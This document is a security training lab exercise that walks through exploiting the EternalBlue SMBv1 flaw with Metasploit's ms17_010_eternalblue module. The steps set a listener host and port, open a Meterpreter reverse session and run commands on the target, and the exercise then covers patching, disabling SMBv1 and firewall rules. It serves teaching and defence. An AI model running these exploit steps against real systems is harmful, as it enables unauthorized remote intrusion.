Exercise 50: Exploiting SMB Vulnerabilities (EternalBlue)

Objective

Simulate an exploit of the SMB vulnerability known as EternalBlue (CVE-2017-0144) to gain unauthorized access to a vulnerable system. Understand the critical importance of patching systems and applying security controls like network segmentation.

---

Scenario

EternalBlue is a serious vulnerability in SMBv1 exploited by malware such as WannaCry and NotPetya. This exercise will simulate how attackers exploit EternalBlue to gain remote access to a Windows system. You will use Metasploit to exploit the vulnerability and learn about the security practices necessary to prevent such attacks.

⚠️ Important: This exercise must be conducted in a legal and controlled environment. Unauthorized exploitation of vulnerabilities is illegal and unethical.

---

Lab Instructions

Step 1: Set Up a Vulnerable Windows Machine

a. Install Windows 7/Server 2008 R2 (Unpatched)

• Deploy a Windows machine without recent security patches.
• Enable SMBv1 protocol.

b. Disable Windows Firewall (for demonstration purposes only)

netsh advfirewall set allprofiles state off

c. Verify SMBv1 is Enabled

sc qc lanmanworkstation

Step 2: Configure the Attacker Machine (Kali Linux)

a. Update Metasploit Framework

sudo apt update
sudo apt install metasploit-framework -y
msfconsole

b. Verify Network Connectivity

ping <target-ip>

Step 3: Exploit the EternalBlue Vulnerability

a. Search for the EternalBlue Module

search eternalblue

b. Select the Exploit Module

use exploit/windows/smb/ms17_010_eternalblue

c. Configure the Exploit

set RHOSTS <target-ip>
set LHOST <attacker-ip>
set LPORT 4444

d. Launch the Exploit

exploit

• Expected Result: The exploit should establish a Meterpreter session, providing remote access.

Step 4: Verify Remote Access

a. Check Current User Privileges

getuid

• Expected Result: Shows the compromised user account.

b. Execute System Commands

shell
whoami

c. List Files on the Target System

ls

Step 5: Discuss Mitigation Strategies

1. Patch Management: Regularly apply security patches (MS17-010 mitigates EternalBlue).
2. Disable SMBv1: Remove legacy protocols.
3. Network Segmentation: Isolate critical systems to limit lateral movement.
4. Firewall Rules: Block SMB traffic at network boundaries.
5. Intrusion Detection/Prevention Systems (IDS/IPS): Detect and block exploit attempts.

---

Solution & Explanation

How EternalBlue Works

• Exploits a flaw in SMBv1 to trigger buffer overflows, enabling remote code execution.
• Malware like WannaCry spread rapidly using this exploit.

Why SMB Vulnerabilities Are Dangerous

• Remote Exploitation: No user interaction is required.
• Network Wormability: Allows self-replicating malware.
• Privilege Escalation: Grants high-level system access.

Mitigation Techniques

1. Apply Security Patches: Install Microsoft’s MS17-010 update.
2. Disable SMBv1:

Set-SmbServerConfiguration -EnableSMB1Protocol $false

3. Implement Firewalls: Block ports 445, 139, and 137.
4. Use IDS/IPS: Detect and mitigate exploit traffic.

---

Testing & Verification

• Before Mitigation: The exploit successfully compromises the system.
• After Mitigation: Attempts to exploit the vulnerability should fail.

Verify SMBv1 is Disabled

Get-SmbServerConfiguration | Select EnableSMB1Protocol

Confirm Patch Installation

wmic qfe | find "KB4013389"

---

Security Best Practices

1. Regular Updates: Maintain up-to-date systems.
2. Disable Legacy Protocols: Remove SMBv1.
3. Network Segmentation: Limit exposure of critical systems.
4. Limit SMB Exposure: Restrict SMB access to trusted networks only.
5. Monitor Network Traffic: Use monitoring tools to detect suspicious SMB traffic.

---

Additional Script (Optional)

Automate Disabling SMBv1 (Windows):

# Disable SMBv1
Set-SmbServerConfiguration -EnableSMB1Protocol $false
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name SMB1 -Value 0 -Force

Automate SMB Blocking (Linux Firewall):

#!/bin/bash
# Block SMB ports
sudo iptables -A INPUT -p tcp --dport 445 -j DROP
sudo iptables -A INPUT -p tcp --dport 139 -j DROP
sudo iptables-save | sudo tee /etc/iptables/rules.v4

---

Conclusion

In this exercise, you exploited the EternalBlue (SMBv1) vulnerability using Metasploit, gained unauthorized access to a Windows machine, and learned how to mitigate the risk through patching, protocol hardening, and network segmentation. Understanding and securing against SMB vulnerabilities is critical for protecting systems from severe attacks.